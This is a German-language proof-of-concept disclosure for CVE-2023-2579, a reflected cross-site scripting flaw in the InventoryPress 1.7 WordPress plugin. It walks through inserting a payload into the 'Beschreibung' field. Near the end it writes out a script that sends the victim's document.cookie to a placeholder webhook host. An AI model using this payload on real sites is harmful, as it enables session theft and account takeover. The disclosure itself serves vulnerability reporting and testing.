
PoC für CVE-2023-2579
Die CVE-2023-2579 ID wurde reserviert und der PoC wurde auf der WPScan-Website veröffentlicht: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe
Titel: Authentifiziertes reflektiertes Cross-Site-Scripting im InventoryPress-Plugin für WordPress CMS
Datum: 2023-04-21
Autor: Danilo Albuquerque
Anbieter-Homepage: https://wordpress.org
Software-Link: https://wordpress.org/download
Version: WordPress 6.2
Name und Version des Plugins: InventoryPress 1.7
Getestet auf: Brave (Version 1.50.119 Chromium: 112.0.5615.121 (Offizielle Version) 64 Bit)
Wenn Sie all dies tun und die aktuelle Seite aktualisieren, wird das Alert-Popup mit der darin enthaltenen Meldung angezeigt.
Gehen Sie zu der Seite, auf der Sie die Artikel zum Inventar hinzufügen können:

Fügen Sie die schädliche Nutzlast in das Eingabefeld "Beschreibung" des Formulars ein:

Rufen Sie den vom Plugin generierten Link des neuen Artikels auf:

Sobald die Anfrage abgeschlossen ist, wird das Alert-Popup angezeigt:

Fügen Sie die folgende Nutzlast zum Stehlen der Cookies in das Eingabefeld "Beschreibung" ein: <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>. Veröffentlichen Sie dann den neuen Artikel oder aktualisieren Sie einen alten;
Lösen Sie den Angriff aus und erhalten Sie die Anmeldedaten auf der Webhook-Seite
Hinzufügen der Nutzlast und Veröffentlichen des Artikels (oder Aktualisieren):

Auslösen und Erhalten der Anmeldedaten:
